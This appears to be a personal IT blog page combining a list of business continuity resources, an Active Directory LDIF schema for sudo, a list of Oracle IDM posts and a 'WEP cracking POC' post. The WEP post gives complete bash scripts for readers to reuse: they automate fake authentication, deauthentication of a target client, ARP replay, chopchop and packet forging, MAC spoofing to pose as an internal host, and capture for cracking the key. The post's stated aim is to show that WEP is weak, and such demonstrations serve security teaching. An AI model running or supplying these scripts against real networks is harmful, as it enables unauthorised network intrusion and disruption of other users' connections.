Business Continuity and Disaster Recovery Planning Resources

1. Checklists, http://www.businesscontingency.com/checklist.php
2. NIST SP800-34, Contingency Planning Guide for Information Technology Systems, http://csrc.nist.gov/publications/nistpubs/800-34/sp800-34.pdf
3. ISO 27002 (or ISO 17799-2005), Code of practice for information security management, BCP is in section 14
   
4. NFPA 1600, Standard on Disaster/Emergency Management and Business Continuity Programs, http://www.nfpa.org/assets/files/pdf/nfpa1600.pdf
   
5. BC Planning model, http://www.drj.com/new2dr/model/bcmodel.htm
   
6. HIPAA, BCP in chapter 164.530, “Administrative Requirements: Policies & Procedures.”
   
7. Gramm-Leach-Bliley (GLB), see Title V, some directives that will impact a financial institution’s BCP
   
8. The state of DR preparedness, Forrester Research, http://www.drj.com/index.php?Itemid=159&ed=10&id=794&option=com_content&task=view
   
9. BCI, http://www.thebci.org/
   
10. DRI Institute, https://www.drii.org/
    
    
    

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng) and then you'll see how it's easy to crack WEP.

So don't use WEP!

###!/bin/bash
# File: crack.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

# Check calling args
if [ $# -ne 1 ]
then
echo "Syntax: $0 CONFIGNAME"; exit 1
fi
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}'
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $1

msg 'Pls start the capture in a separate terminal'
prompt 'Run fake reauthenticationl? [y]'
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
case $SEL in
0)
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# Chop chop
msg 'Will run ARP replay'
aireplay-ng -3 -e "$ssid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$ssid" -h $mac0 $if
#aireplay-ng -$SEL -e "$ssid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
read capfile

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
msg 'Will forge ARP packet'
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac

=============================================================

###!/bin/bash
# File: cap.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
opts=""

#######################################
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

usage(){
echo "Syntax: $0 (no args: interactive)"
echo " $0 IF -f CONFIGNAME [AIRODUMP-NG_OPTS]"
echo " $0 IF -c CHANNEL [AIRODUMP-NG_OPTS]"
}
#######################################
readConfig(){
CONFNAME=$1
shift

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $CONFNAME
opts="--bssid $bssid" # Filter APs by BSSID
opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
opts="$opts -t $type" # Filter APs by cipher suite
opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
opts="$opts --channel $channel" # Capture on specific channels
opts="$opts $*"
}
#######################################
capture(){
#opts="$opts --ivs" # Save only captured IVs
#opts="$opts --gpsd" # Use GPSd
opts="$opts --update 2" # Display update delay in seconds
#opts="$opts --showack" # Prints ack/cts/rts statistics
#opts="$opts -h" # Hides known stations for --showack
#opts="$opts -f 1000" # Time in ms between hopping channels
opts="$opts -a" # Filter unassociated clients

if [ "$mac0" != "" ]
then
prompt "Change MAC to $mac0? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor $mac0
fi
else
prompt "Configure for $if for monitoring mode? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor
fi
fi
cmd="airodump-ng $opts $if"
msg "About to run: $cmd"
cd dump
$cmd

prompt "Configure $if back to normal managed mode? [n]"
if [ "$SEL" = "y" ]
then
cd ..
./wlanconfig.sh $if managed
fi
}
#######################################
interact(){
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

prompt "Use a known configuration? [n]"
if [ "$SEL" = "y" ]
then
prompt "Enter config name:"
readConfig $SEL
return
fi

prompt "Capture on a specific channel? [n]"
if [ "$SEL" = "y" ]
then
channel=1
prompt "Enter channel number: [$channel]"
if [ "$SEL" != "" ]
then
channel=$SEL
fi
opts="--channel $channel"
opts="$opts -w ch$channel" # Dump file prefix
fi
prompt "Filter on cypher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
if [ "$SEL" != "" ]
then
opts="$opts -t $SEL"
fi
}
#######################################

# Check calling args
if [ $# -eq 1 ]
then
usage
exit 1
fi
if [ $# -ge 2 ]
then
if=$1 ; shift;
op=$1 ; shift
else
op=interactive
fi

case $op in
-c)
channel=$1
shift
opts="-w ch$channel" # Dump file prefix
opts="$opts -c $channel" # Capture on specific channels
opts="$opts $*"
capture
;;
-f)
readConfig $*
capture
;;
interact*)
interact $*
capture
;;
*)
usage
esac

=========================================================

###!/bin/bash
# File: wlanconfig.sh
PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin

printUsage(){
echo
echo "Usage: $0 IF MODE [NEWMAC]"
echo
echo "Examples:"
echo " $0 ath0 managed"
echo " $0 ath0 monitor"
echo " $0 wlan0 monitor"
echo " $0 wlan0 monitor 11:22:33:44:55:66"
echo
}

if [ $# -lt 2 ]
then
printUsage
exit 1
fi

case $2 in
managed)
mode=sta
;;
monitor)
mode=monitor
;;
*)
printUsage
exit 1
esac

if=$1
bif=$1
modecmd=$2
mac=$3

echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

case $1 in
*)
channel=6 # Wireless channel
essid="TESTSSID" # SSID
bssid=00:18:39:C4:F6:85 # MAC of AP
mac0=00:29:2F:E5:AA:15 # Masquerading as internal MAC (if required by AP)
mac1=00:1F:F3:F9:C1:B1 # MAC of known target
# key=C3E07361D029ACEE81234446B4 (saved here after cracking)
type=WEP
band=g
;;
esac

Sudo config in Active Directory

My Active Directory schema update proposal got included in the sudo distribution. See the Sudo Change Log. The sudo README was also updated. I tested this successfully using LDAP-UX on HP-UX 11.X (11.1 or 11.2). This means that we could centralize the sudo configuration for multiple HP-UX hosts by using the sudo configuration coming from AD.

Here's my original post on the sudo website...

FYI,

I’m sending this to let other people benefit from this AD schema extension file in LDIF. This should work for most AD domain controller installations used as an LDAP server. As described in http://www.gratisoft.us/sudo/readme_ldap.html, this schema extension is necessary prior to loading the sudoers.ldif file in AD.

Note that the sudo distribution only includes the OpenLDAP and iPlanet extensions so the following file provides support for AD.

I was able to load it on my Windows 2003 server installation after using the following schema extension.

Cheers,
Eric.

# BEGINNING OF FILE
#==========================================================================
# File : sudoers-ad-schema.ldf
# Description : Active Directory Schema for sudo configuration (sudoers)
# Sanitized by : Eric Paquet, http://www.pcdsolutions.com
# Updated : 2008/05/08
# Support Info : No support, use at your own risk
#
# To extend your Active Directory schema, run the following command
# on your Windows DC:
#
# ldifde -i -f sudoers-ad-schema.ldf -c dc=X dc=YOURDOMAIN,DC=COM
#==========================================================================
dn: CN=sudoUser,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: attributeSchema

cn: sudoUser

distinguishedName:
CN=sudoUser,CN=Schema,CN=Configuration,DC=X

instanceType: 4

attributeID: 1.3.6.1.4.1.15953.9.1.1

attributeSyntax: 2.5.5.5

isSingleValued: FALSE

showInAdvancedViewOnly: TRUE

adminDisplayName: sudoUser

adminDescription: User(s) who may run sudo

oMSyntax: 22

searchFlags: 1

lDAPDisplayName: sudoUser

name: sudoUser

schemaIDGUID:: JrGcaKpnoU+0s+HgeFjAbg==

objectCategory:

CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoHost,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: attributeSchema

cn: sudoHost

distinguishedName:
CN=sudoHost,CN=Schema,CN=Configuration,DC=X

instanceType: 4

attributeID: 1.3.6.1.4.1.15953.9.1.2

attributeSyntax: 2.5.5.5

isSingleValued: FALSE

showInAdvancedViewOnly: TRUE

adminDisplayName: sudoHost

adminDescription: Host(s) who may run sudo

oMSyntax: 22

lDAPDisplayName: sudoHost

name: sudoHost

schemaIDGUID:: d0TTjg+Y6U28g/Y+ns2k4w==

objectCategory:

CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoCommand,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: attributeSchema

cn: sudoCommand

distinguishedName:
CN=sudoCommand,CN=Schema,CN=Configuration,DC=X

instanceType: 4

attributeID: 1.3.6.1.4.1.15953.9.1.3

attributeSyntax: 2.5.5.5

isSingleValued: FALSE

showInAdvancedViewOnly: TRUE

adminDisplayName: sudoCommand

adminDescription: Command(s) to be executed by sudo

oMSyntax: 22

lDAPDisplayName: sudoCommand

name: sudoCommand

schemaIDGUID:: D6QR4P5UyUen3RGYJCHCPg==

objectCategory:

CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoRunAs,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: attributeSchema

cn: sudoRunAs

distinguishedName: CN=sudoRunAs,CN=Schema,CN=Configuration,DC=X

instanceType: 4

attributeID: 1.3.6.1.4.1.15953.9.1.4

attributeSyntax: 2.5.5.5

isSingleValued: FALSE

showInAdvancedViewOnly: TRUE

adminDisplayName: sudoRunAs

adminDescription: User(s) impersonated by sudo

oMSyntax: 22

lDAPDisplayName: sudoRunAs

name: sudoRunAs

schemaIDGUID:: CP98mCQTyUKKxGrQeM80hQ==

objectCategory:

CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoOption,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: attributeSchema

cn: sudoOption

distinguishedName:
CN=sudoOption,CN=Schema,CN=Configuration,DC=X

instanceType: 4

attributeID: 1.3.6.1.4.1.15953.9.1.5

attributeSyntax: 2.5.5.5

isSingleValued: FALSE

showInAdvancedViewOnly: TRUE

adminDisplayName: sudoOption

adminDescription: Option(s) followed by sudo

oMSyntax: 22

lDAPDisplayName: sudoOption

name: sudoOption

schemaIDGUID:: ojaPzBBlAEmsvrHxQctLnA==

objectCategory:

CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoRole,CN=Schema,CN=Configuration,DC=X

changetype: add

objectClass: top

objectClass: classSchema

cn: sudoRole

distinguishedName:
CN=sudoRole,CN=Schema,CN=Configuration,DC=X

instanceType: 4

possSuperiors: container

possSuperiors: top

subClassOf: top

governsID: 1.3.6.1.4.1.15953.9.2.1

mayContain: sudoCommand

mayContain: sudoHost

mayContain: sudoOption

mayContain: sudoRunAs

mayContain: sudoUser

rDNAttID: cn

showInAdvancedViewOnly: FALSE

adminDisplayName: sudoRole

adminDescription: Sudoer Entries

objectClassCategory: 1

lDAPDisplayName: sudoRole

name: sudoRole

schemaIDGUID:: SQn432lnZ0+ukbdh3+gN3w==

systemOnly: FALSE

objectCategory:
CN=Class-Schema,CN=Schema,CN=Configuration,DC=X

defaultObjectCategory:
CN=sudoRole,CN=Schema,CN=Configuration,DC=X

# END OF FILE

My Oracle IDM posts

Those are just for my own reference:

1. eSSO LM with ADAM
   Posted on: Apr 4, 2007 5:58 PM
2. OIM PeopleSoft Connector Employee Bulk Reconciliation
   Posted on: Sep 5, 2007 10:46 PM
3. Oracle eSSO Kiosk Mode - Application Shutdown
   Posted on: Apr 3, 2007 11:25 PM
4. About Oracle Enterprise single sign-on ESSO
   Posted on: Jun 4, 2007 6:47 PM
5. Configuration Assistants Fail after SOA Suite 10.1.3 install
   Posted on: Dec 14, 2007 8:03 PM
6. Flat File Generic Connector: Unable to Create Connector
   Posted on: Feb 5, 2008 11:59 PM
7. OIM - AD Connector 904
   Posted on: Aug 3, 2007 11:00 AM
8. OIM Admin Console Customization: Replacing product logo
   Posted on: Feb 27, 2008 8:09 PM
9. OIM Rogue Accounts Report
   Posted on: Feb 26, 2008 11:22 AM
10. Searching for OIM user based on UDF using API
    Posted on: Jan 15, 2008 9:43 PM